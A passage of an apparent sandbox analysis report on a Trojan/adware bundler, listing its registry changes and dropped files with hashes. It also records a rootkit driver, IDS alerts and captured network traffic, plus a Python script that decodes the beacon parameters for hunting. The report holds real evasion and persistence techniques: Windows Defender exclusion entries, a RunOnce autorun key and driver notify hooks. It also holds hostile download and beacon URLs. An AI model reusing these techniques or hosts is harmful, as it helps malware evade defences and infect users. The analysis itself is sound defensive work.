[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"EnableFileTracing" = "0"

To run itself automatically each time Windows boots, the Trojan adds the following reference to its file under the autorun key in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"%original file name%.exe" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"D69B561148F01C77C54578C10926DF5B856976AD"

The process setup.4.15.f.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\upm]
"app" = "4B E8 E3 9B FD 1F 55 BF DE BA AF 90 5C B8 C7 EA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayIcon" = "%Program Files%\EnjoyWiFi\EnjoyWiFi.exe"
"InstallLocation" = "%Program Files%\EnjoyWiFi"
"UninstallString" = "%Program Files%\EnjoyWiFi\uninst.exe"

[HKLM\SOFTWARE\Microsoft\SystemSettings\Fetcher]
"01" = "E3 72 9B 4B 6C 70 5D 09 F5 23 83 45 5D 8F 8B C8"

[HKLM\System\CurrentControlSet\services\wfcre\Parameters]
"374335773" = "3A C8 3F 6D C1 E8 51 B0 0A D2 ED EF 6F 39 D2 3F"

[HKLM\System\CurrentControlSet\services\wfcre]
"Group" = "PNP_TDI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayName" = "EnjoyWiFi"

[HKLM\System\CurrentControlSet\services\wfcre]
"Start" = "1"

The process adv_334.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"p2pcollab.dll,-8042" = "Peer to Peer Trust"
"qagentrt.dll,-10" = "System Health Authentication"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"dnsapi.dll,-103" = "Domain Name System (DNS) Server Trust"

[HKLM\SOFTWARE]
"global UID" = "JQL2PBZ4BRSSJ9BVD5CGZSCYGG62XGDE"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"fveui.dll,-844" = "BitLocker Data Recovery Agent"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"fveui.dll,-843" = "BitLocker Drive Encryption"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process adv_334.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"tSTyTySFVfUEcTqwC" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"thzXuJvjU" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"tSTyTySFVfUEcTqwC" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\LocalLow]
"HGQlVNXRXkVsT" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"dCHHaxjOpqUn" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions]
"cmhomipkklckpomafalojobppmmidlgl" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\LocalLow]
"HGQlVNXRXkVsT" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%\Mozilla Firefox\browser\features]
"{5C3FD6D1-9185-4195-B5E1-FAB622427F59}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp]
"gJSJnJhSyQxKVwHx" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"QYERbvxRHIE" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions]
"cmhomipkklckpomafalojobppmmidlgl" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp]
"gJSJnJhSyQxKVwHx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"GXZiGyYLSHyU2" = "0"
"QYERbvxRHIE" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"GXZiGyYLSHyU2" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%\Mozilla Firefox\browser\features]
"{5C3FD6D1-9185-4195-B5E1-FAB622427F59}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction]
"225451" = "6"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"dCHHaxjOpqUn" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"thzXuJvjU" = "0"

The process sdfCF40.exe:2912 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"MaxFileSize" = "1048576"

The process Setup.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process Setup.exe:4028 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1478708930"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process starter.exe:3588 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableConsoleTracing" = "0"

The process ytab_m_1_big.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"tSTyTySFVfUEcTqwC" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"thzXuJvjU" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"tSTyTySFVfUEcTqwC" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\LocalLow]
"HGQlVNXRXkVsT" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"dCHHaxjOpqUn" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions]
"cmhomipkklckpomafalojobppmmidlgl" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\LocalLow]
"HGQlVNXRXkVsT" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%\Mozilla Firefox\browser\features]
"{5C3FD6D1-9185-4195-B5E1-FAB622427F59}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp]
"gJSJnJhSyQxKVwHx" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"QYERbvxRHIE" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions]
"cmhomipkklckpomafalojobppmmidlgl" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp]
"gJSJnJhSyQxKVwHx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"GXZiGyYLSHyU2" = "0"
"QYERbvxRHIE" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"GXZiGyYLSHyU2" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%\Mozilla Firefox\browser\features]
"{5C3FD6D1-9185-4195-B5E1-FAB622427F59}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction]
"225451" = "6"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"dCHHaxjOpqUn" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"thzXuJvjU" = "0"

Dropped PE files

MD5 File path
764b1ff923126715e2b443a3a4c155f7 c:\Program Files\EnjoyWiFi\EnjoyWiFi.exe
6fa4163081ad4a38e405c169ea361ff1 c:\Program Files\EnjoyWiFi\uninst.exe
497648a5cbdd6baba950f93d3f5353fc c:\Program Files\EnjoyWiFi\wfcrecf.dll
68b4e74c33aaf425c9782f922eb927e9 c:\Program Files\EnjoyWiFi\wftinst.dll
c7d4d685a0af2a09cbc21cb474358595 c:\Program Files\EnjoyWiFi\zlib.dll
007b1d8aef31be74ce6845fe68e1471d c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\SilentInstaller_dotnet4[1].exe
7fb4cfd0b99640776711a458b04a4278 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe
cf6516116ddf26bd15a9142174ffcad7 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\59f124f63a374212b0ef101e658ab10f\enjoyWIFI.exe
ddc3b9ce3e41282fb75474bf45af1808 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\e3b3a628d7fa4f019f25eea6f351c9fd\starter.exe
007b1d8aef31be74ce6845fe68e1471d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\sdfCF40.exe
0c4eb503e6c1774acb6c5de66aa02d6c c:\Windows\System32\drivers\wfcre.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\wfcre.sys", the Trojan controls the loading of executable images into memory by installing a load-image notify routine.
Using the driver "%System%\drivers\wfcre.sys", the Trojan controls operations on the system registry by installing a registry notify routine.

Propagation

VersionInfo

Company Name:
Product Name: update
Product Version: 1.1.1.1
Legal Copyright:
Legal Trademarks: jdk
Original Filename: kenpachi.exe
Internal Name: kenpachi.exe
File Version: 1.1.1.1
File Description:
Comments: java
Language: English (United Kingdom)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 157956 158208 4.16108 84053e31c2b042290889540f53458d57
.sdata 172032 744 1024 4.08083 310538834e2383082d452e702cef5dcd
.rsrc 180224 57844 57856 4.00892 bac6821e414dfe9c6507016cd1ce0a6d
.reloc 245760 12 512 0.056519 9de9a162f45bd70704546d8224dd9183

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Double User-Agent (User-Agent User-Agent)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY External IP Lookup sina.com.cn
ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /prepreinstaller_win.exe HTTP/1.1
Host: d21m4u3yvwhf8i.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 266752
Connection: keep-alive
Date: Fri, 11 Aug 2017 17:37:14 GMT
Last-Modified: Wed, 22 Feb 2017 07:34:34 GMT
ETag: "7fb4cfd0b99640776711a458b04a4278"
Accept-Ranges: bytes
Server: AmazonS3
Age: 65676
X-Cache: Hit from cloudfront
Via: 1.1 e430a35037c484cf19f375480cabfca3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: C3aKYWdyFBU_rrZo7SPEQG4Qzerw291jXcnCfENWSx3GWN5OJnqK4Q==

<<< skipped >>>

GET /apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml HTTP/1.1
Host: cdn.ijnewhb.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Content-MD5: usysLlirjb9CcsmmYlN5Zw==
Content-Type: text/text
Date: Tue, 29 Aug 2017 21:57:15 GMT
Etag: 0x8D4E5515B4714EF
Last-Modified: Thu, 17 Aug 2017 09:21:35 GMT
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 335a1e7a-0001-000d-3411-212f60000000
x-ms-version: 2009-09-19
Content-Length: 18912

<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjlDNzNDRjNENkVDQTIxQjA2OTY3Q0QyODM3REI0NEFGNTNGMzFCQUY5NjA0N0NFQjQxMkNEMjQyQkVCNDVDRTY1NzlBRUNEM0NDOEQwQkI5MzMzMzNBRUI2N0Y2ODU0NTdGODc5NEMwNzBDNjhFODlDNUVEMDlBQzk5N0UyM0Yx HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:43 GMT
Connection: close
Content-Length: 0


GET /StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev HTTP/1.1
Host: svc-stats.linkury.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:11 GMT
{"d":"50027"}


POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip


HTTP/1.1 100 Continue
....



order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5Qgp8Wm5nC3OdADDXpeo1xX9lvwBbusYEF3IIKtjXF8quuck96
qfxr6SS3BFIG4O9JUgsnQtYphoySybiDf7vupPQ1CLl08 v6HAPVb3FUNUn0H0QMBH2rr2
WtSjbPE H8A=="


HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Tue, 29 Aug 2017 21:57:38 GMT
Content-Encoding: gzip
14........................0..


GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: d21m4u3yvwhf8i.cloudfront.net


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 321536
Connection: keep-alive
Date: Wed, 09 Aug 2017 17:15:29 GMT
Last-Modified: Tue, 09 Aug 2016 18:36:36 GMT
ETag: "007b1d8aef31be74ce6845fe68e1471d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 23292
X-Cache: Hit from cloudfront
Via: 1.1 3664cc1fd21a07e55327a9c256fa758a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vrdI7c0XLeqwIWba3r2nt-uKtB3Zwkm908iQ7Fz7AsyVDWEAnldZwA==
[binary response body: PE image (MZ/PE headers; sections .text, .rsrc, .reloc); 321536 bytes per Content-Length]

<<< skipped >>>

POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5Qowugf4yiepz11dwTzHOeHv nKas3GqVD5RXfKTFCs4xLJI2Z
xzbqjvyDRSpao W9gry8u2qUlmorA7HIPEd15I7F9lLp iZUj3BZkVdDH4aEf8r3 2b9O1
jL1rLzzRT1A=="


HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Tue, 29 Aug 2017 21:57:06 GMT
Content-Encoding: gzip
14........................0..


GET /?file=bundle HTTP/1.1
Host: VVV.djapp.info
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 29 Aug 2017 21:57:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d21m4u3yvwhf8i.cloudfront.net/prepreinstaller_win.exe
0..


GET hXXp://events.fveocylq.net/?p=cHViX2lkPTU0MiZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MzM0JmJpdmVyc2lvbj0xLjgmbWd1aWQ9ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4 HTTP/1.1
Host: events.fveocylq.net
Proxy-Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 29 Aug 2017 21:57:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..
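Two of the requests above carry their real parameters inside base64: the `/jihuo.aspx` query sent to jk.yeawindows.com and the `p=` parameter sent to events.fveocylq.net. The following decoder is an added example written for this page, not code from the report or from the malware; the URLs are copied verbatim from the capture (kept defanged as `hXXp`), and the jk.yeawindows.com host is taken from that request's Host header. The `p=` value decodes to an ordinary query string whose `extra_params` names the SilentInstaller stage downloaded from cloudfront.net above; the `/jihuo.aspx` value decodes to an upper-case hex string, 96 bytes of opaque data that the page does not identify, so nothing beyond the hex decoding is attempted.

```python
"""Decode the base64 beacon parameters from the capture (added example, not from the report)."""
import base64
import binascii
import string
from urllib.parse import unquote

# Request targets copied verbatim from the capture above, kept defanged (hXXp) as on the page.
# The /jihuo.aspx request carried only a path, so its host is taken from the Host header.
EVENTS_URL = "hXXp://events.fveocylq.net/?p=cHViX2lkPTU0MiZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MzM0JmJpdmVyc2lvbj0xLjgmbWd1aWQ9ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4"
JIHUO_URL = "hXXp://jk.yeawindows.com/jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjlDNzNDRjNENkVDQTIxQjA2OTY3Q0QyODM3REI0NEFGNTNGMzFCQUY5NjA0N0NFQjQxMkNEMjQyQkVCNDVDRTY1NzlBRUNEM0NDOEQwQkI5MzMzMzNBRUI2N0Y2ODU0NTdGODc5NEMwNzBDNjhFODlDNUVEMDlBQzk5N0UyM0Yx"


def raw_query(url):
    """Everything after the first '?', untouched."""
    return url.partition("?")[2]


def parse_query(query):
    """Split k=v pairs with percent-decoding only.

    urllib's parse_qs would turn a '+' inside a base64 value into a space, so it is avoided here."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def b64decode_lenient(text):
    """Base64-decode, restoring any '=' padding the sender dropped."""
    return base64.b64decode(text + "=" * (-len(text) % 4))


def decode_events_beacon(url):
    """events.fveocylq.net wraps a plain query string in base64 under p=."""
    inner = b64decode_lenient(parse_query(raw_query(url))["p"]).decode("utf-8")
    return parse_query(inner)


def decode_jihuo_beacon(url):
    """jk.yeawindows.com sends base64 over an upper-case hex string; return the raw bytes.

    The page does not say how those bytes were produced, so no further decoding is attempted."""
    hex_text = b64decode_lenient(raw_query(url)).decode("ascii")
    if not hex_text or any(c not in string.hexdigits for c in hex_text):
        raise ValueError("decoded query is not a hex string")
    return binascii.unhexlify(hex_text)


if __name__ == "__main__":
    for key, value in decode_events_beacon(EVENTS_URL).items():
        print(f"{key} = {value}")
    blob = decode_jihuo_beacon(JIHUO_URL)
    print(f"/jihuo.aspx payload: {len(blob)} bytes")
```

The decoded `p=` fields (`pub_id`, `setup_id`, `extra_params`, `event`, `sid`, `mac`, `adv_id`, `biversion`, `mguid`) are the affiliate/install-tracking identifiers a hunt would pivot on; `mguid` in particular is a per-install GUID and can be searched for across other captures. The 96-byte `/jihuo.aspx` blob is a multiple of 16 bytes, which is consistent with block-cipher output, but that is an inference and the page does not name a cipher.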


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1
Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1694
Expect: 100-continue
Connection: Keep-Alive


